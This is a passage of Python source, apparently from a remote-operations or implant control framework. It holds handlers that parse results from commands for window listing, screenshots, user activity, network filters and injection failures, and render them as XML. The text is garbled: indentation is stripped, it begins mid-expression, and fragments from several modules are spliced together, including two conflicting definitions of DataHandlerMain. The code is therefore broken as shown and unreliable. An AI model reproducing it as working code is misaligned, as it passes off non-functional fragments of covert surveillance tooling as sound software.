eventResults.subcategoryGuid[4], eventResults.subcategoryGuid[5],
eventResults.subcategoryGuid[6], eventResults.subcategoryGuid[7],
eventResults.subcategoryGuid[8], eventResults.subcategoryGuid[9],
eventResults.subcategoryGuid[10],
eventResults.subcategoryGuid[11],
eventResults.subcategoryGuid[12],
eventResults.subcategoryGuid[13],
eventResults.subcategoryGuid[14],
eventResults.subcategoryGuid[15]))
sub.AddAttribute('category', category)
sub.AddAttribute('categoryNative', eventResults.category)
if len(eventResults.subcategory) > 0:
sub.AddAttribute('subcategory', subcategory)
sub.AddAttribute('subcategoryNative', eventResults.subcategory)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleString(output, msg):
results = StringResult()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('String')
xml.SetText(results.str)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.status.cmd.windows',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Windows', 'windows', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
if input.GetStatus() == ERR_INJECT_SETUP_FAILED or input.GetStatus(
) == ERR_INJECT_FAILED:
import mcl.injection.errors
output.RecordModuleError(moduleError, 0, errorStrings)
output.RecordModuleError(osError, 0,
mcl.injection.errors.errorStrings)
else:
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
if msg.GetCount() == 0:
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Info')
xml.SetText('Action completed')
output.RecordXml(xml)
output.EndWithStatus(input.GetStatus())
return True
rtn = mcl.target.CALL_SUCCEEDED
for entry in msg:
if entry['key'] == MSG_KEY_RESULT_BUTTON:
if _handleButtonsData(msg, output) != mcl.target.CALL_SUCCEEDED:
rtn = mcl.target.CALL_FAILED
elif entry['key'] == MSG_KEY_RESULT_SCREENSHOT:
if _handleScreenShotData(msg, output) != mcl.target.CALL_SUCCEEDED:
rtn = mcl.target.CALL_FAILED
elif entry['key'] == MSG_KEY_RESULT_WINDOW_STATION:
if _handleWindowStationData(msg,
output) != mcl.target.CALL_SUCCEEDED:
rtn = mcl.target.CALL_FAILED
elif entry['key'] == MSG_KEY_RESULT_WINDOW_INFO:
if _handleWindowsData(msg, output) != mcl.target.CALL_SUCCEEDED:
rtn = mcl.target.CALL_FAILED
else:
output.RecordError('Unhandled data key (0x%08x)' % entry['key'])
rtn = mcl.target.CALL_FAILED
output.EndWithStatus(rtn)
return True
def _handleGetFilter(output, msg):
results = ResultGetFilter()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Filter')
_printFilter(results.adapterFilter, results.filter, xml)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.status.cmd.activity',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Activity', 'activity', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
else:
if msg.GetCount() == 0:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
results = Result()
results.Demarshal(msg)
if results.moreData and results.lastActivity.GetTimeType(
) == results.lastActivity.MCL_TIME_TYPE_NOT_A_TIME:
output.GoToBackground()
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
if results.moreData:
xml.Start('NewActivity')
else:
xml.Start('Activity')
xml.AddTimeElement('Last', results.lastActivity)
output.RecordXml(xml)
if results.moreData:
output.End()
return True
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def processSuspended(msg, output):
if msg.GetCount() == 0:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Suspended')
output.RecordXml(xml)
output.GoToBackground()
output.End()
return True
